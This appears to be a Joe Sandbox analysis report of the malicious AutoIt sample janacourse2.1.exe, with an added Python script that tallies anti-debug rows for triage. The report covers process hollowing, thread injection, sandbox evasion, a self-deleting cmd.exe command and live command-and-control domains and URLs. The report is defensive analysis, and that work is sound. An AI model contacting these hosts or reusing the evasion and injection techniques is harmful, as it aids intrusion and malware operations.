          1_2_03430BCD mov eax, dword ptr fs:[00000030h] (3x)
          1_2_034DEBD0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03438BF0 mov eax, dword ptr fs:[00000030h] (3x)
          1_2_0345EBFC mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034BCBF0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03440BBE mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034E4BB0 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03436A50 mov eax, dword ptr fs:[00000030h] (7x)
          1_2_03440A5B mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0346CA6F mov eax, dword ptr fs:[00000030h] (3x)
          1_2_034DEA60 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034ACA72 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034BCA11 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0346CA24 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0345EA2E mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03454A35 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03486ACC mov eax, dword ptr fs:[00000030h] (3x)
          1_2_03430AD0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03464AD0 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0346AAEE mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0343EA80 mov eax, dword ptr fs:[00000030h] (9x)
          1_2_03504A80 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03468A90 mov edx, dword ptr fs:[00000030h] (1x)
          1_2_03438AA0 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03486AA4 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034B0946 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03504940 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03456962 mov eax, dword ptr fs:[00000030h] (3x)
          1_2_0347096E mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0347096E mov edx, dword ptr fs:[00000030h] (1x)
          1_2_034D4978 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034BC97C mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034AE908 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034BC912 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03428918 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034B892A mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034C892B mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034C69C0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_0343A9D0 mov eax, dword ptr fs:[00000030h] (6x)
          1_2_034649D0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034FA9D3 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034BE9E0 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034629F9 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034429A0 mov eax, dword ptr fs:[00000030h] (13x)
          1_2_034309AD mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034B89B3 mov esi, dword ptr fs:[00000030h] (1x)
          1_2_034B89B3 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_03442840 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_03460854 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03434859 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034BE872 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034C6870 mov eax, dword ptr fs:[00000030h] (2x)
          1_2_034BC810 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_03452835 mov eax, dword ptr fs:[00000030h] (5x)
          1_2_03452835 mov ecx, dword ptr fs:[00000030h] (1x)
          1_2_0346A830 mov eax, dword ptr fs:[00000030h] (1x)
          1_2_034D483A mov eax, dword ptr fs:[00000030h] (2x)
          1_2_0345E8C0 mov eax, dword ptr fs:[00000030h] (1x)
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01010B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD09D5 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_005679E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
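The rows above are Joe Sandbox "Code function" entries of two shapes: disassembly rows, where each `mov <reg>, dword ptr fs:[00000030h]` is a read of the PEB pointer (fs:[30h] in a 32-bit process, the usual first step of a BeingDebugged or NtGlobalFlag check, and also how position-independent code walks the loader lists), and comma-separated API call chains such as the IsDebuggerPresent rows. The sandbox prints one row per occurrence, so a single function can produce a dozen identical rows. The Python below is an added example, not Joe Sandbox code: it parses both row shapes, counts PEB reads per function and register, and flags functions whose call chain names a debugger check. The sample rows are copied from this report as extracted (the run-together `...exeCode function:` spacing and the trailing function ID are tolerated by the regex; rows with a space after the path parse the same way). ANTI_DEBUG_APIS is my own list, not the report's.

```python
"""Aggregate Joe Sandbox 'Code function' rows for anti-debug triage (added example)."""
import re
from collections import Counter

# Rows copied from the report as extracted; constructed sample, not a full dump.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90",
    r"Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FE2622",
    r"Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0100D27A GetUserNameW,0_2_0100D27A",
]

# "Source: <path>Code function: <pid_run_addr> <body><pid_run_addr>"; the path may or may
# not be followed by a space, and the trailing repeated ID (a link column) is optional.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>\S+?)\s*Code function:\s*(?P<fn>\d+_\d+_[0-9A-F]+)\s+"
    r"(?P<body>.*?)\s*(?:(?P=fn))?\s*$"
)
PEB_READ_RE = re.compile(r"\bmov\s+(?P<reg>e[a-z]{2}),\s*dword ptr fs:\[00000030h\]")

# APIs whose presence in a call chain is a classic debugger check (my own list, not the report's).
ANTI_DEBUG_APIS = {
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess",
    "OutputDebugStringA", "OutputDebugStringW",
}


def parse_rows(rows):
    """Return (source, function_id, body) for each 'Code function' row; other rows are skipped."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            parsed.append((m["src"], m["fn"], m["body"].rstrip(",")))
    return parsed


def peb_reads(rows):
    """Count fs:[30h] reads per (source, function), keyed by destination register."""
    counts = {}
    for src, fn, body in parse_rows(rows):
        m = PEB_READ_RE.search(body)
        if m:
            counts.setdefault((src, fn), Counter())[m["reg"]] += 1
    return counts


def api_chains(rows):
    """Return {(source, function): [api, ...]} for rows whose body is a comma-separated API chain."""
    chains = {}
    for src, fn, body in parse_rows(rows):
        if PEB_READ_RE.search(body) or " " in body:
            continue  # disassembly, not an API list
        chains[(src, fn)] = [api for api in body.split(",") if api]
    return chains


def anti_debug_findings(rows):
    """One line per flagged function: PEB readers first, then debugger-API callers, in report order."""
    findings = []
    for (src, fn), regs in peb_reads(rows).items():
        detail = ", ".join(f"{reg} x{n}" for reg, n in sorted(regs.items()))
        findings.append(f"{fn} in {src}: {sum(regs.values())} PEB read(s) via fs:[30h] ({detail})")
    for (src, fn), apis in api_chains(rows).items():
        hits = [api for api in apis if api in ANTI_DEBUG_APIS]
        if hits:
            findings.append(f"{fn} in {src}: calls {', '.join(hits)}")
    return findings


if __name__ == "__main__":
    for line in anti_debug_findings(SAMPLE_ROWS):
        print(line)
```

Run it over the full "Anti Debugging" section of a report (one row per line) to get one line per function instead of one per instruction; the register breakdown matters because a `mov ecx`/`mov edx` read usually belongs to a different code path (for example a loader-list walk) than the `mov eax` reads of a BeingDebugged check.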

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80
          Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\explorer.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 480000
          Source: C:\Users\user\Desktop\janacourse2.1.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 295F008
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01011201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FF2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101B226 SendInput,keybd_event
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101E355 mouse_event
          Source: C:\Users\user\Desktop\janacourse2.1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\janacourse2.1.exe"
          Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01010B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01011663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: janacourse2.1.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe Binary or memory string: Progman
          Source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
          Source: explorer.exe, 00000002.00000002.2892314485.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1656745980.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2892873256.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.1656745980.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2892873256.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD0698 cpuid
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01028195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0100D27A GetUserNameW
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FEBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: janacourse2.1.exe | Binary or memory string: WIN_81
Source: janacourse2.1.exe | Binary or memory string: WIN_XP
Source: janacourse2.1.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: janacourse2.1.exe | Binary or memory string: WIN_XPe
Source: janacourse2.1.exe | Binary or memory string: WIN_VISTA
Source: janacourse2.1.exe | Binary or memory string: WIN_7
Source: janacourse2.1.exe | Binary or memory string: WIN_8

          Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01031204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_01031204
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01031806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_01031806

Mitre Att&ck Matrix

Techniques are listed per tactic column; the number in parentheses is the count shown in the matrix for that technique.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Shared Modules (1); Command and Scripting Interpreter (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (612); RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Rootkit (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (612)
Credential Access: Credential API Hooking (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (215); Security Software Discovery (341); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1586586, Sample: janacourse2.1.exe, Startdate: 09/01/2025, Architecture: WINDOWS, Score: 100)

Start node: contacts www.ffgzgbl.xyz, www.suv-deals-49508.bond and 4 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures. www.ffgzgbl.xyz: Performs DNS queries to domains with low reputation.
  janacourse2.1.exe 1 (started) | signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
    svchost.exe (started) | signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
      explorer.exe 43 1 (injected) | network: www.suv-deals-49508.bond 185.53.179.91, 49827, 80, TEAMINTERNET-ASDE, Germany; energyecosystem.app 3.33.130.190, 50003, 80, AMAZONEXPANSIONGB, United States | signature: System process connects to network (likely due to code injection or exploit)
        explorer.exe (started) | signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          cmd.exe 1 (started)
            conhost.exe (started)

Antivirus detection (Source | Detection | Scanner):
janacourse2.1.exe | 32% | Virustotal
janacourse2.1.exe | 100% | Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
energyecosystem.app | 3.33.130.190 | true | true |  | unknown
www.suv-deals-49508.bond | 185.53.179.91 | true | true |  | unknown
www.imxtld.club | unknown | unknown | true |  | unknown
www.6vay.boats | unknown | unknown | true |  | unknown
www.energyecosystem.app | unknown | unknown | true |  | unknown
www.ffgzgbl.xyz | unknown | unknown | true |  | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://www.suv-deals-49508.bond/hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A | true | Avira URL Cloud: safe | unknown
http://www.energyecosystem.app/hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE | true | Avira URL Cloud: safe | unknown
www.7b5846.online/hwu6/ | true | Avira URL Cloud: safe | unknown
                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.inefity.cloudReferer:explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.ffgzgbl.xyzexplorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.imxtld.clubReferer:explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://outlook.com_explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.miexplorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.vytech.netReferer:explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.suv-deals-49508.bond/hwu6/explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://schemas.microexplorer.exe, 00000002.00000002.2897659949.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2899099491.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1660354222.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                      high
